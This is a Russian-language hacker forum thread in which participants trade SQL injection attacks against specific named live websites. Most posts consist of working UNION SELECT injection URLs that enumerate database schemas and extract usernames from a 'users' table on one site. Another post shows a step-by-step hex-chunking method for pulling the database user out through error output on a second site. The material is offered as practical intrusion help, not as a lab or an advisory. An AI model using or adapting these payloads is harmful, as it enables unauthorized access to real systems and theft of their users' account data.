Сообщение от
kingbeef
kingbeef said:
Зачем регистрироватся, если ты работаешь с БД ?
Table 'sevseun.users' doesn't exist
Нету прав у юзера на доступ к этой таблице.
lolwut?
Почему ты утверждаешь, что к таблице нету доступа, когда ошибка говорит об отсутствии таблицы как таковой? MySQL шутник тот еще, шутки шутит, ага.
Таблица находится в другой БД, хакер.
Код:
Code:
http://www.sevseun.com/downloads.php?page_id=1075%27+and+0+union+select+1,2,3,4,TABLE_SCHEMA,6,7,8,9,10,11,12,13,14,15,16+from+information_scheMa.columns+where+table_name=%27users%27+limit+0,1--%20a
--
aukro
Код:
Code:
http://www.sevseun.com/downloads.php?page_id=1075%27+and+0+union+select+1,2,3,4,username,6,7,8,9,10,11,12,13,14,15,16+from+aukro.users--%20a
Сообщение от
kingbeef
kingbeef said:
Таблица есть. Из нее вытаскивались колонки.
...
Сообщение от
Unknowhacker
Unknowhacker said:
Просто у меня были такие случаи на практике, когда после регистрации получалось вытянуть.
Звучит крайне прохладно.
Unknowhacker, что такое "пентабельное поле"? Я могу понять не выговаривать букву "р", но не иметь возможности ее написать это что-то новенькое.
И по поводу http://www.auto-alliance.org/item.php?id=6319+And+1=-0+union+select+version%28%29+--+
Вывод там есть, в ошибке, что ниже. Но на вывод возможны только числовые значения, так еще и определенной длины.
Объяснять более подробно, что там происходит просто впадлу, да и бессмысленно =\
Код:
Code:
http://www.auto-alliance.org/item.php?id=6319%20and(0)%20UNION%20SELECT%20hex(mid(user(),1,2))--%20a
http://www.auto-alliance.org/item.php?id=6319%20and(0)%20UNION%20SELECT%20hex(mid(user(),3,2))--%20a
http://www.auto-alliance.org/item.php?id=6319%20and(0)%20UNION%20SELECT%20hex(mid(user(),5,2))--%20a
http://www.auto-alliance.org/item.php?id=6319%20and(0)%20UNION%20SELECT%20hex(mid(user(),7,2))--%20a
Инкриминируем это число на 2, пока не будет нуля и полученные значения записываем (полученные значения будут выводится тут Error loading image: /image2.php?id=
[NUM]), потом полученный результат анхексаем и получаем заветные данные.